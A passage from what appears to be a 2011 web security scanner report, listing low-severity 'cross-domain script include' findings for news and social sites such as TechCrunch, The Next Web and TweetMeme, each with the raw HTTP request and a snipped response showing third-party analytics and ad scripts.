</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=aM1itcjS8r36OVadbiUzgI&amp;s=61&amp;lang=en"></script>
...[SNIP]...

21.341. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js

Request

GET /wp-content/plugins/fbconnect/xd_receiver.htm HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=018ba7e06c4505193be6bdac2b0628d9&extern=0&channel=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fwp-content%2Fplugins%2Ffbconnect%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 06 Dec 2010 16:20:51 GMT
ETag: "241427-173-496c0458b4d24"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>cross domain receiver pa
...[SNIP]...
<body>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js" type="text/javascript"></script>
...[SNIP]...

21.342. http://techcrunch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techcrunch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://b.scorecardresearch.com/beacon.js
  • http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/0873.js
  • http://edge.quantserve.com/quant.js
  • http://platform.twitter.com/widgets.js
  • http://s.gravatar.com/js/gprofiles.js?o&ver=MU
  • http://s.stats.wordpress.com/w.js?19
  • http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
  • http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/crunchboard_widget_v2.js?m=1268505624g
  • http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&ver=MU
  • http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
  • http://wordpress.com/remote-login.php?action=js&host=techcrunch.com&id=11718616&t=1295961499&back=techcrunch.com%2F
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en
  • http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en
  • http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:20:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Tue, 25 Jan 2011 13:18:19 +0000
Cache-Control: max-age=186, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
X-nananana: Batcache
Content-Length: 124771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&amp;host=techcrunch.com&amp;id=11718616&amp;t=1295961499&amp;back=techcrunch.com%2F' type="text/javascript"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&amp;ver=MU'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</a>
                       <script type="text/javascript" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/crunchboard_widget_v2.js?m=1268505624g"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>        
       <script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/0873.js"> </script>
...[SNIP]...

21.343. http://thenextweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://connect.facebook.net/en_US/all.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://static.fmpub.net/site/thenextweb
  • http://static.fmpub.net/zone/2620
  • http://static.fmpub.net/zone/2621
  • http://static.getclicky.com/js

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 127.0.0.1
Set-Cookie: PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 102006
Date: Tue, 25 Jan 2011 13:27:48 GMT
Age: 665
Connection: close
X-Cache: HIT

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>The Next Web | TNW is the International Source for Internet Ne
...[SNIP]...
<div id="fmpub_2621" class="banner-wrapper">
<script type="text/javascript" async="true" src="http://static.fmpub.net/zone/2621" charset="utf-8"></script>
...[SNIP]...
</h3>

<script type="text/javascript" src="http://static.fmpub.net/zone/2620"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'> </script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type="text/javascript" src="http://static.fmpub.net/site/thenextweb"></script>
...[SNIP]...

21.344. http://top.net.mk/joomla-verzii/44-joomla-16-dojde

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top.net.mk
Path:   /joomla-verzii/44-joomla-16-dojde

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.addtoany.com/menu/locale/mk.js
  • http://static.addtoany.com/menu/page.js
  • http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /joomla-verzii/44-joomla-16-dojde HTTP/1.1
Host: top.net.mk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 089e4fa19af2efc7c60bdb03ea3a2cbe=27129c0bc3f4bbc294183027f453203c; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="mk-mk" lang="mk-mk"
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/locale/mk.js" charset="utf-8"></script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

21.345. http://trailer.commercialtrucktrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trailer.commercialtrucktrader.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: trailer.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 97842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<!-- dstolweb02-php5b -->
<html>
<head>
   <title>Truck Trailers For Sale | CommercialTruckTrader.com</title>
   <meta name="description" c
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.346. http://tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:52 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; expires=Mon, 31-Jan-2011 22:20:52 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.01006293296814
X-Served-In: 0.074193954467773
X-Served-By: h04
Content-Length: 55778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.347. http://tweetmeme.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:10 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0001378059387207
X-Served-In: 0.0068099498748779
X-Served-By: h00
Content-Length: 24610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Abo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.348. http://tweetmeme.com/about/advertising

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:34 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00011515617370605
X-Served-In: 0.0066850185394287
X-Served-By: ded2059
Content-Length: 22733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Adv
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.349. http://tweetmeme.com/about/advertising/display

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/display

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/display HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010180473327637
X-Served-In: 0.0058400630950928
X-Served-By: h01
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Dis
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.350. http://tweetmeme.com/about/advertising/featured_tweets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/featured_tweets

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/featured_tweets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:59 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00012493133544922
X-Served-In: 0.0067188739776611
X-Served-By: h00
Content-Length: 23493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Fea
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.351. http://tweetmeme.com/about/advertising/retweet_ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/advertising/retweet_ads

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/advertising/retweet_ads HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:47:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0059108734130859
X-Served-By: h03
Content-Length: 23166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ret
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.352. http://tweetmeme.com/about/bookmarklet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/bookmarklet

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/bookmarklet HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0021569728851318
X-Served-In: 0.023491859436035
X-Served-By: ded2060
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.353. http://tweetmeme.com/about/channels

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/channels

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/channels HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.9897384643555E-5
X-Served-In: 0.0062339305877686
X-Served-By: ded2059
Content-Length: 22892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Cha
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.354. http://tweetmeme.com/about/follow_button

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/follow_button

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/follow_button HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0001060962677002
X-Served-In: 0.0063591003417969
X-Served-By: h04
Content-Length: 24677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twi
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.355. http://tweetmeme.com/about/plugins

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/plugins

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/plugins HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 9.4175338745117E-5
X-Served-In: 0.0085899829864502
X-Served-By: ded2060
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ret
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.356. http://tweetmeme.com/about/plugins/chrome

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/plugins/chrome

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/plugins/chrome HTTP/1.1
Host: tweetmeme.com
